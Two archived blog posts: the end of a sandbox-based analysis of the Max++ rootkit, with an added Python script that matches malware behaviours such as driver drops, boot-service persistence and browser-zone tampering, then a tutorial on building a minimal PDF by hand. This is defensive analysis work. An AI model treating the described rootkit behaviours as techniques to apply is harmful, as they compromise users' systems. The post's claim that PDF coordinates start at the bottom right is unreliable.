<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFv9BaqgBB_49TtO6MhqMx77mhau3xylX1c8XvKrtFdXUCS57Rma4JcGZmH52RDS6iGads0rbOD8HMpoa5c15b_I2xGzit5dk7-1EIQo3iWglVlJ8y0a0YTB2PIKfAT9OX4Pq7EjKjm2Dx/s1600/Figure+1-16.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFv9BaqgBB_49TtO6MhqMx77mhau3xylX1c8XvKrtFdXUCS57Rma4JcGZmH52RDS6iGads0rbOD8HMpoa5c15b_I2xGzit5dk7-1EIQo3iWglVlJ8y0a0YTB2PIKfAT9OX4Pq7EjKjm2Dx/s640/Figure+1-16.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.16 - Anubis analysis of processes started by the Max++ malware</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">In <i>Figure 1.16</i> we have a list of the new processes started in addition to the main Max++ process; specifically, “dwwin.exe” and “drwtsn32” are the two processes started by the malware. Compared with GWISandbox, Anubis lets us see not only the changes made by the main Max++ process but also the changes made by its child processes.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo8EhQApSGGZae45uRgki-dVSMRgJnaPuxNuVriAPhG5-VxhDJmjzK0Y1m5Pk2aBfLjpJ7RsFjJtXbYGeBl5CI1Bx4aslqP7PP98ilUG-3IicwWabb-vDv043nC4Qz9WkJ1WOFfx4URzEs/s1600/Figure+1-17.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="556" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo8EhQApSGGZae45uRgki-dVSMRgJnaPuxNuVriAPhG5-VxhDJmjzK0Y1m5Pk2aBfLjpJ7RsFjJtXbYGeBl5CI1Bx4aslqP7PP98ilUG-3IicwWabb-vDv043nC4Qz9WkJ1WOFfx4URzEs/s640/Figure+1-17.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.17 - Anubis Max++ analysis of registry modifications made by the dwwin process</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">The process dwwin.exe is started by Max++, and <i>Figure 1.17</i> displays all the registry modifications made by this child process. We are able to see the registry keys and the new values created for each entry. All the registry keys modified by this process relate to Internet Explorer and likely cripple the security features of the browser.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
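To turn the behaviours pulled from the GWISandbox and Anubis reports above (driver files dropped under system32, a service entry under ControlSet001, Internet Explorer settings changed by the dwwin child, the outbound connection, the self-deleted sample) into something repeatable, here is an added triage pass over sandbox-style events. It is my own example, not code from the post or from either sandbox; the event format, the process and file names, and the sample events are constructed for illustration.

```python
# Added example, not part of the original post or of either sandbox: a small
# triage pass over dynamic-analysis events of the kind GWISandbox and Anubis
# report, turning the behaviours discussed in this section into rules. The event
# format, process names and sample paths below are constructed for illustration.
import re
from dataclasses import dataclass


@dataclass
class Event:
    process: str  # process that performed the action (main sample or a child)
    kind: str     # "file", "registry", "network" or "process"
    action: str   # create / modify / delete / read / connect / start
    target: str   # file path, registry value, remote endpoint or child process name


# (indicator, risk, event kind, actions that count, regex over the target).
# The risk labels follow the low/medium/high scale of the Anubis summary.
RULES = [
    ("driver dropped into system32\\drivers or dllcache", "high", "file",
     {"create", "modify"}, re.compile(r"\\system32\\(drivers|dllcache)\\", re.I)),
    ("service configured under ControlSet to start at boot", "high", "registry",
     {"create", "modify"},
     re.compile(r"\\ControlSet\d+\\Services\\[^\\]+\\(Start|ImagePath)$", re.I)),
    ("Internet Explorer zone security settings changed", "medium", "registry",
     {"create", "modify"}, re.compile(r"\\Internet Settings\\Zones\\", re.I)),
    ("outbound network connection", "medium", "network", {"connect"}, re.compile(r".")),
    # dwwin.exe / drwtsn32.exe are the Windows Dr. Watson crash-reporting
    # processes: seeing them means a process faulted during the run, which is
    # worth knowing when a sample seems to do little in the sandbox.
    ("Dr. Watson crash handler started", "low", "process", {"start"},
     re.compile(r"^(dwwin|drwtsn32)(\.exe)?$", re.I)),
]


def deleted_itself(events, sample_path):
    """True if any process deleted the sample file, as GWISandbox reported for Max++."""
    return any(e.kind == "file" and e.action == "delete"
               and e.target.lower() == sample_path.lower() for e in events)


def triage(events, sample_path):
    """Map each matched indicator to (risk, ["process: target", ...]), aggregated
    over the main process and its children the way the Anubis report presents them."""
    hits = {}
    for e in events:
        for name, risk, kind, actions, pattern in RULES:
            if e.kind == kind and e.action in actions and pattern.search(e.target):
                hits.setdefault(name, (risk, []))[1].append("%s: %s" % (e.process, e.target))
    if deleted_itself(events, sample_path):
        hits["sample deleted its own file"] = ("high", [sample_path])
    return hits


def highest_risk(hits):
    """Overall verdict: the highest risk label among the matched indicators."""
    order = {"low": 0, "medium": 1, "high": 2}
    return max((risk for risk, _ in hits.values()), key=order.get, default="none")


# Constructed sample events modelled on the behaviours described above.
SAMPLE = r"C:\Documents and Settings\user\Desktop\sample.exe"
EVENTS = [
    Event("sample.exe", "file", "create", r"C:\WINDOWS\system32\drivers\afd.sys"),
    Event("sample.exe", "file", "create", r"C:\WINDOWS\system32\drivers\afd.sys.new"),
    Event("sample.exe", "file", "create", r"C:\WINDOWS\system32\dllcache\afd.sys.new"),
    Event("sample.exe", "file", "delete", SAMPLE),
    Event("sample.exe", "registry", "modify", r"HKLM\SYSTEM\ControlSet001\Services\afd\Start"),
    Event("sample.exe", "network", "connect", "10.20.25.255"),
    Event("sample.exe", "process", "start", "dwwin.exe"),
    Event("dwwin.exe", "registry", "modify",  # constructed IE zone value path
          r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400"),
]

if __name__ == "__main__":
    report = triage(EVENTS, SAMPLE)
    for name, (risk, where) in report.items():
        print("[%s] %s" % (risk.upper(), name))
        for w in where:
            print("    ", w)
    print("verdict:", highest_risk(report))
```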
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZc4W57n47B9ICqgdny96NXK6qDy5sABPAOkszGmQARAe-2dHiNI1fHgap2xVBJ-WZNef9hmZa__C-R3mwz1avmjICWJ7GTQYHMYQ9o6cSYQp6frlSf7N8iDXI7VEK3lpDR_neDdSpCims/s1600/Figure+1-18.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZc4W57n47B9ICqgdny96NXK6qDy5sABPAOkszGmQARAe-2dHiNI1fHgap2xVBJ-WZNef9hmZa__C-R3mwz1avmjICWJ7GTQYHMYQ9o6cSYQp6frlSf7N8iDXI7VEK3lpDR_neDdSpCims/s640/Figure+1-18.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.18 - Anubis Max++ analysis of file activity by the dwwin process</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">In <i>Figure 1.18</i> Anubis gives us the files modified by the “drwtsn” process. One dump file, “7B563.dmp”, is created and later deleted from the system's temporary folder. Another file, “9ad1_appcompat.txt”, is also deleted. This information was not presented in the report GWISandbox generated.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdSPykTeR7UghGSSCp3Zhq4uG_qm5jHtFvFKctxQSKxB-K-VzsaKMBV0OnRLXdv9iFjvrA2HyBOMpXrwqK6wiZZNicjBYHeevg0GRYS8BCJ6ssLBTT6W4La4GzK-sCLP-tOrLjyB2vQEjG/s1600/Figure+1-19.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdSPykTeR7UghGSSCp3Zhq4uG_qm5jHtFvFKctxQSKxB-K-VzsaKMBV0OnRLXdv9iFjvrA2HyBOMpXrwqK6wiZZNicjBYHeevg0GRYS8BCJ6ssLBTT6W4La4GzK-sCLP-tOrLjyB2vQEjG/s640/Figure+1-19.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.19 - Anubis Max++ analysis of registry values modified by the drwtsn process</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">A second process, “drwtsn”, is started by the Max++ executable. <i>Figure 1.19</i> displays the registry changes made by this child process. “drwtsn” is a system file that is part of the Windows operating system. The file is normally located in “C:\windows” or “C:\windows\system32”; however, malware is known to disguise itself as this system file [2]. In <i>Figure 1.20</i> we have all the file changes performed by the “drwtsn” process. A new folder labeled “Dr Watson” is created under the Microsoft directory, and the executable, log, and dump file are created here. The process also accesses information stored in the original Max++ executable file. Anubis also provides us with the file system control and device control communication: the file “isarpc” is accessed three times, and the file “ksecDD” is accessed eight times in the Anubis analysis.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNdMih6FK_tl4aDf0mW3IRCuD42hxH_GpRWrWXwfZQiGZhQGcHstsmHmagJeanA-nUcTZRAzt7CNmD9f2grhGCCHbkq3i4YvUizaKGfkdkLjZJTyKxbXQCeyB8ZyB5iO52RakuMHlk7mpl/s1600/Figure+1-20.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="448" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNdMih6FK_tl4aDf0mW3IRCuD42hxH_GpRWrWXwfZQiGZhQGcHstsmHmagJeanA-nUcTZRAzt7CNmD9f2grhGCCHbkq3i4YvUizaKGfkdkLjZJTyKxbXQCeyB8ZyB5iO52RakuMHlk7mpl/s640/Figure+1-20.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.20 - Anubis Max++ analysis of file activity by the drwtsn process</td></tr>
</tbody></table><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="line-height: 115%;"><span style="font-size: large;"><b>4. Conclusion</b></span></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">To briefly summarize this section, Max++ is an advanced rootkit that creates, modifies, and deletes files and registry keys on a computer without the user's consent. It opens network connections, and its penetration of the system is extensive. I have presented several malware analyses from online web services and the changes they report on an infected system. I will continue to delve into the code of the Max++ rootkit and analyze an anti-debugging technique frequently used by this malware.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="line-height: 115%;"><span style="font-size: large;"><b>5. References</b></span></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">[1] Dr. Xiang Fu, "Malware Analysis Tutorial 1: VM Based Analysis Platform", Available at <a href="http://fumalwareanalysis.blogspot.com/2011_10_01_archive.html">http://fumalwareanalysis.blogspot.com/2011_10_01_archive.html</a></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">[2] Giuseppe Bonfa, "Step-by-Step Reverse Engineering Malware: ZeroAccess / Max++ / Smiscer Crimeware Rootkit", Available at <a href="http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessMaxsmiscer-crimeware-rootkit/" target="_blank">http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessMaxsmiscer-crimeware-rootkit/</a></span></span></div>
<div>2012-02-19T12:26:00.000-08:00</div>
<div><span style="font-size: large;">How to Manually Create a PDF</span></div>
The Portable Document Format (PDF) was a proprietary format controlled by Adobe until July 1, 2008, when the open standard was released to the public. It is independent of software, hardware, and operating system, and the format is commonly used for document exchange. One topic for a later discussion is the use of PDFs to embed malicious code and run it on an unsuspecting computer. First let us concentrate on the different sections of a PDF and how to create a document manually.<br />
<div class="MsoNormal"><br />
<div class="MsoNormal"><br />
</div><div class="MsoNormal">A PDF is a file that consists of several objects. In general you have four parts to a PDF file structure.<o:p></o:p></div><div class="MsoNormal"></div><ol><li>The <b>header</b> states the PDF specification that this file follows</li>
<li>The <b>body</b> contains all the objects that make up the document</li>
<li>The <b>cross-reference table</b> lists the locations of the indirect objects in the file</li>
<li>The <b>trailer</b> specifies the location of the cross reference table and other special objects</li>
</ol><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqwVzTyjSO5HvMiyj-s-uuNwuasqC7L0AcUUaslXXi6SANguU3P_oq-fojwlraJzR9hVVdObIInnmzgINGLtRU-5BlTOREDUcVXggIab7X3hfwoThdTv240GIeCJhx51y5OkfWlXEhOaIx/s1600/Figure1-1.jpg" imageanchor="1"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqwVzTyjSO5HvMiyj-s-uuNwuasqC7L0AcUUaslXXi6SANguU3P_oq-fojwlraJzR9hVVdObIInnmzgINGLtRU-5BlTOREDUcVXggIab7X3hfwoThdTv240GIeCJhx51y5OkfWlXEhOaIx/s400/Figure1-1.jpg" width="197" /></a></div><div class="MsoNoSpacing" style="text-indent: -24px;"><o:p><br />
</o:p></div><div class="MsoNoSpacing">Below is a simple example PDF I created with Notepad. It prints a “Hello World!” message centered at the top of the document. I will show the code and explain each section one by one.<o:p></o:p></div><div class="MsoNormal" style="text-indent: .5in;"><br />
</div><div class="MsoNormal" style="text-indent: .5in;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYhouAZyGBwRFhyrIGBfRAaQY-iX2OVawpEiI9Cu2PwKSN71r7j7J_xad97UrwEu_E3CeiOhWTKXxgeMfImxNByFKu-5IqXYZ7GiZdQ5nBO69-vR0T55nUc82Td-afEgPVBOI5pdwo56O7/s1600/Figure1-2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYhouAZyGBwRFhyrIGBfRAaQY-iX2OVawpEiI9Cu2PwKSN71r7j7J_xad97UrwEu_E3CeiOhWTKXxgeMfImxNByFKu-5IqXYZ7GiZdQ5nBO69-vR0T55nUc82Td-afEgPVBOI5pdwo56O7/s1600/Figure1-2.JPG" /></a></div><div class="MsoNormal"><o:p></o:p></div><div class="MsoNormal" style="text-indent: .5in;"><br />
</div><div class="MsoNoSpacing"><br />
The header section contains the version of the PDF specification that my file conforms to. In my example I use version 1.0. Next is the first object, which is a catalog object. If you think of a tree data structure, the catalog object is the root, and all other elements grow or build on this node.<o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7dbpZ2PxQuGIKdDCESOBPcl4z1HV4QAHGpf-PaZgpx_1-56Q1psf-l9wK7MIrq8LNCzYvSq2x2jlatb8LwdYxwmrnUT2PDiQU3_UY9zmq58PnJ9KDQ-NkGIa6LcC-88ZeqADYTsGgzpjp/s1600/Figure1-3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7dbpZ2PxQuGIKdDCESOBPcl4z1HV4QAHGpf-PaZgpx_1-56Q1psf-l9wK7MIrq8LNCzYvSq2x2jlatb8LwdYxwmrnUT2PDiQU3_UY9zmq58PnJ9KDQ-NkGIa6LcC-88ZeqADYTsGgzpjp/s1600/Figure1-3.JPG" /></a></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">Line 3 of the code specifies that the object number is 1 and the generation is 0. Similar to HTML, the object must be enclosed in starting and closing tags: on line 3 you have the “obj” keyword, which specifies that this is an object, and on line 9 you have the “endobj” closing keyword, which marks the end of the object. The double angle brackets on lines 4 and 8 are necessary to enclose a dictionary object, which is simply a collection of pairs of objects where the first element of each pair is a key and the second element is a value. Line 5 specifies the type of the object, which is a “Catalog” object. Let us disregard line 6 for now and discuss it later when we describe actions to perform when opening a document, or when we explore inserting JavaScript into our PDF. Line 7 is a reference to a “Pages” object, which in turn contains references to individual “Page” objects. Here we list the object number of the “Pages” object, which is 2, and its generation, which is 0. The “R” in the statement is a keyword that stands for reference.<o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIBkM36ngRyKMiDTxjSlbpJozwE3LWxqMEZFoLZkZVG8dt5EuVH-t05WrrvUCh-I3QrqoD9G-l22w8UeJJf9Vpzwnlh1IULtA_rG7SW9ndtgGbWbPGKxspQP3mdCorkukyz1W9qqRlbcOW/s1600/Figure1-4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIBkM36ngRyKMiDTxjSlbpJozwE3LWxqMEZFoLZkZVG8dt5EuVH-t05WrrvUCh-I3QrqoD9G-l22w8UeJJf9Vpzwnlh1IULtA_rG7SW9ndtgGbWbPGKxspQP3mdCorkukyz1W9qqRlbcOW/s1600/Figure1-4.JPG" /></a></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">Our second object is the “Pages” object, which contains references to individual pages. Be careful not to confuse the “Pages” object with the “Page” object. As you can see above, the type of this object is “Pages”, and we introduce a new entry called “Count”. Count is the number of pages that this object points to; in this simple example we only have one page. On line 15 we specify the required keyword “Kids”, which points to the individual page object. The next object is our “Page” object, and it is object number 3.<o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcQ2NtCMWjJhYwnmaOwQaqVZWIMxO3RAl2D-NoH32sktLh-NKUYWT7hmhdD5fdwq5iJ0Kzut5O6RDDX3ElVxJHsosB4QIjicG3io_K-RJyRVooWdpHAjrc8cBSz1c557X6xlmaMbO-dmT7/s1600/Figure1-5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcQ2NtCMWjJhYwnmaOwQaqVZWIMxO3RAl2D-NoH32sktLh-NKUYWT7hmhdD5fdwq5iJ0Kzut5O6RDDX3ElVxJHsosB4QIjicG3io_K-RJyRVooWdpHAjrc8cBSz1c557X6xlmaMbO-dmT7/s1600/Figure1-5.JPG" /></a></div><br />
<div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">Similar to the “Pages” object, the “Page” object also has to declare its type, on line 21. On line 22, instead of Kids, you must list the parent of the object, which in this case is object 2 (Pages). On line 23 I list the resources used by this object; here a font resource is necessary. I only declare a name for the font I will use and give a reference to a font object that fully declares the font type and size. In my example, my “Font” object is number 5. On line 25 I use the entry “MediaBox”, which is a required entry for a page object and defines the boundaries of the page. The last entry I use for the Page object is “Contents”, which is a reference to the object that contains the text we wish to display. In my example this is object 4, which is a stream object. <o:p></o:p></div><div class="MsoNoSpacing"><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyCSBFiBhA3cP4xkQ1eGw_3TG71a60lxpH5pmbwjSCmbBQXaaO2FI8lnkPmPDFnkAoh4mG6GWJvveNrjbNt20toY4IeKJQ8SInNqQzyMFSk1ljLIDMPmmoP-W6fOWA-aI7pKMSgIqT5w5D/s1600/Figure1-6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyCSBFiBhA3cP4xkQ1eGw_3TG71a60lxpH5pmbwjSCmbBQXaaO2FI8lnkPmPDFnkAoh4mG6GWJvveNrjbNt20toY4IeKJQ8SInNqQzyMFSk1ljLIDMPmmoP-W6fOWA-aI7pKMSgIqT5w5D/s1600/Figure1-6.JPG" /></a></div><o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">First, on line 31 we must include the length, which is the size in bytes from just after “stream” to just before “endstream”. If we count the bytes we get a size of 45. Next are the tags for the stream object: line 32 is the start tag, “stream”, and line 37 is the end tag, “endstream”. Lines 33 and 36 are the opening and closing tags for text: “BT” stands for begin text, and “ET” stands for end text. Line 34 selects our font, which we declared as “F1”, and sets the font size to 24. Something to note is how operators and their operands are written. The operands are pushed on the stack first; the operator comes after them, and when it is executed it pops the operands off the stack. This is what is happening on line 34: the font “F1” and the size 24 are pushed on the stack, then the operator “Tf” pops the two operands off. On line 35, 250 and 700 are the distances measured from the bottom right side of the document; at this coordinate the text “Hello, World!” will be displayed. Additionally, if we desired, we could add an optional filter entry to specify how the stream data is encoded if it is not in plain text. <o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtCYKMtSFqTgrmb4_9oLSqcKr7oFVvyVspAL7ZVziESR3chSjVf717AvY899t94TRU0eLXaiZ7iykKkpbxfYr4JuKYUNAz5QcoUYdc0htxAlx3ts__0Ac0_XdxQDRCUIWsEf3D5G9hFz1p/s1600/Figure1-7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtCYKMtSFqTgrmb4_9oLSqcKr7oFVvyVspAL7ZVziESR3chSjVf717AvY899t94TRU0eLXaiZ7iykKkpbxfYr4JuKYUNAz5QcoUYdc0htxAlx3ts__0Ac0_XdxQDRCUIWsEf3D5G9hFz1p/s1600/Figure1-7.JPG" /></a></div> <o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">Object number 5 is the font object referenced earlier. Here we fully declare the font object. We must first declare the type, similar to the catalog and page objects; the type for this object is “Font”. Line 43 is a required entry in the font dictionary: there are seven subtypes to choose from, and the different values can be found in the Portable Document Format Specification <a href="http://www.adobe.com/devnet/pdf_reference.html">[1]</a>. For our example I use “Type1”. The entry “BaseFont” on line 44 simply gives the name of the font we use, which is Helvetica. <o:p></o:p></div><div class="MsoNoSpacing"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQPqi4K-sRghIh4SVFrMQmFjKXwNxXvvXAFVW_bcFSB-Kq_582nl35tI7fo0E0_hZhDll5wJsruV-igmnbsUkzL2TnUceqlyjl9iPI44gq-NVU4pAn220qN61H2912rxQLsFS_jCxRfTQ5/s1600/Figure1-8.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQPqi4K-sRghIh4SVFrMQmFjKXwNxXvvXAFVW_bcFSB-Kq_582nl35tI7fo0E0_hZhDll5wJsruV-igmnbsUkzL2TnUceqlyjl9iPI44gq-NVU4pAn220qN61H2912rxQLsFS_jCxRfTQ5/s1600/Figure1-8.JPG" /></a></div><div class="MsoNoSpacing"><br />
</div><div class="MsoNoSpacing">The last section that must be included to close a PDF document is the xref and trailer section. <o:p></o:p></div><div class="MsoNoSpacing">Line 49 specifies the number of object entries in the document, including the xref object. The number of entries is 6, and it is referenced again inside the trailer section to indicate the size. Also, on line 54 we have a reference to the catalog object (object 1), which is the root node. We end with a closing startxref tag and an end-of-file tag on line 58. This completes the creation of a PDF that will be read by a PDF reader. Only the bare essentials are included in my example; normally the cross reference table would include the byte offset of each object in the document. <o:p></o:p></div><div class="MsoNoSpacing"><br />
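The walkthrough above leaves the cross-reference offsets out; as an added example (my own code, not the file from the post's screenshots) the following script builds the same five-object “Hello, World!” document, computes the stream Length (45 bytes, as above) and the real byte offsets for the xref table, and then reads the table back to check that each offset lands on its object. The MediaBox size (612 by 792 points, US Letter) is an assumption.

```python
# Added example: builds the same five-object "Hello, World!" PDF described in the
# walkthrough, but computes the stream /Length and the xref byte offsets instead
# of leaving them out. Not the file from the post's screenshots; the MediaBox
# dimensions (US Letter, 612 x 792 points) are an assumption.

def build_hello_pdf(text="Hello, World!", version="1.0"):
    """Return (pdf_bytes, {object number: byte offset}, offset of the xref table)."""
    # Content stream: BT/ET wrap the text object, Tf selects font F1 at 24 points,
    # Td moves the text origin (PDF user space starts at the page's lower-left corner)
    # and Tj shows the string. Operands are written before the operator that uses them.
    content = "BT\n/F1 24 Tf\n250 700 Td\n(%s) Tj\nET" % text
    objects = {
        1: "<< /Type /Catalog /Pages 2 0 R >>",
        2: "<< /Type /Pages /Count 1 /Kids [3 0 R] >>",
        3: ("<< /Type /Page /Parent 2 0 R /Resources << /Font << /F1 5 0 R >> >> "
            "/MediaBox [0 0 612 792] /Contents 4 0 R >>"),
        # /Length counts the bytes between "stream\n" and "\nendstream": 45 here.
        4: "<< /Length %d >>\nstream\n%s\nendstream" % (len(content.encode("latin-1")), content),
        5: "<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>",
    }
    out = bytearray(("%%PDF-%s\n" % version).encode("latin-1"))
    offsets = {}
    for num in sorted(objects):
        offsets[num] = len(out)  # byte offset of "N 0 obj", needed for the xref table
        out += ("%d 0 obj\n%s\nendobj\n" % (num, objects[num])).encode("latin-1")
    xref_offset = len(out)
    size = len(objects) + 1  # entries 0..5; entry 0 is the head of the free list
    out += ("xref\n0 %d\n" % size).encode("latin-1")
    out += b"0000000000 65535 f \n"  # every xref entry is exactly 20 bytes
    for num in sorted(objects):
        out += ("%010d 00000 n \n" % offsets[num]).encode("latin-1")
    out += ("trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (size, xref_offset)).encode("latin-1")
    return bytes(out), offsets, xref_offset


def check_xref(pdf):
    """Re-read startxref and the xref table and confirm each in-use entry really
    points at "N 0 obj". Returns the verified (object number, offset) pairs; a
    reader that trusts a wrong offset would show an empty or broken document."""
    tail = pdf[pdf.rfind(b"startxref"):].split(b"\n")
    xref_at = int(tail[1])
    lines = pdf[xref_at:].split(b"\n")
    if lines[0] != b"xref":
        raise ValueError("startxref does not point at an xref table")
    first, count = (int(x) for x in lines[1].split())
    verified = []
    for i in range(count):
        offset, _gen, kind = lines[2 + i].split()
        num = first + i
        if kind == b"n":
            if not pdf[int(offset):].startswith(b"%d 0 obj" % num):
                raise ValueError("xref entry for object %d is wrong" % num)
            verified.append((num, int(offset)))
    return verified


if __name__ == "__main__":
    pdf, offsets, xref_at = build_hello_pdf()
    with open("hello.pdf", "wb") as fh:
        fh.write(pdf)
    print("wrote hello.pdf; objects at", offsets, "xref at", xref_at,
          "verified", check_xref(pdf))
```

Running the script writes hello.pdf, which any PDF reader should open and render exactly like the hand-written version.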
</div><div class="MsoNoSpacing">In the next article I will explore actions that are available in the PDF format as well as embedding JavaScript in a document.<o:p></o:p><br />
<br />
<br />
